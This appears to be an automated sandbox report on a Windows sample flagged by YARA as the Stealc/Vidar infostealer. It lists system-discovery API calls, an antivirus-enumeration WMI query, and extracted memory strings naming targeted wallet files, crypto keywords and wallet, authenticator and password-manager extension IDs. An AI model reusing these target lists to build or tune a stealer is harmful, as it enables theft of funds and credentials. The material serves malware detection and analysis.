Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0063A644
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0063CE00
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_0063CEA3
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_0063FF24

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062D8CB lstrcpyA,GetLocalTime,SystemTimeToFileTime,

0_2_0062D8CB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006228AF GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_006228AF

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062298A GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_0062298A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C3F8390 NSS_GetVersion,

0_2_6C3F8390

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.64ecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass 